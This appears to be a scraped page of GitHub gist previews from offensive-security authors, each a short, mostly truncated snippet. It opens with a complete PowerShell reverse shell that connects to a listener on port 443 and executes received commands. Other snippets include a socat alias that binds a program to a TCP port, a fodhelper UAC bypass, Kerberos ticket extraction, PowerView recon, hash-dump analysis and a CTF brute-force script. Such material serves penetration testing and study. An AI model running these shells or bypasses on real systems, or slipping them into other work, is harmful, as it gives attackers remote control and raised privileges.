ohpe

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

bandrel

#!/usr/bin/env python3

#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>

import argparse
import re

parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")

FrankSpierings

#!/bin/bash

#
# Script requires `brew`
# - `/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"`
#
# Variables 
# - $IPA -> Source IPA
# - $MOBILEPROVISION -> Source embedded.mobileprovision
#                       find ~/Library/Developer/Xcode | grep embedded.mobileprovision

jaredcatkinson

function Get-KerberosTicketGrantingTicket
{
    <#
    .SYNOPSIS

    Gets the Kerberos Tickets Granting Tickets from all Logon Sessions

    .DESCRIPTION

    Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

netbiosX

<#
.SYNOPSIS  
    This script can bypass User Access Control (UAC) via fodhelper.exe
　
    It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts 
    an elevated command prompt. 
    　
.NOTES  
    Function   : FodhelperUACBypass
    File Name  : FodhelperUACBypass.ps1 

Mcostart

#!/usr/bin/python
import xml.etree.ElementTree as ET
import subprocess
import time
import os
#http://xael.org/pages/python-nmap-en.html
import nmap

def parseMasscanReport(path):
	hostsPorts = {}

tsunpoko

import urllib
import urllib2

url = 'http://gap.chal.ctf.westerns.tokyo/login.php'

flag = 'TWCTF{'

table = 'abcdefghijklmnopqrstuvwlyz'
table += table.upper()
table += '_{}'

dogrocker

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

• Open the Monitor Mode

root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up

superkojiman

# Add to .bashrc
# You're welcome
function soocat {
    socat tcp-l:${2},reuseaddr,fork EXEC:${1}
}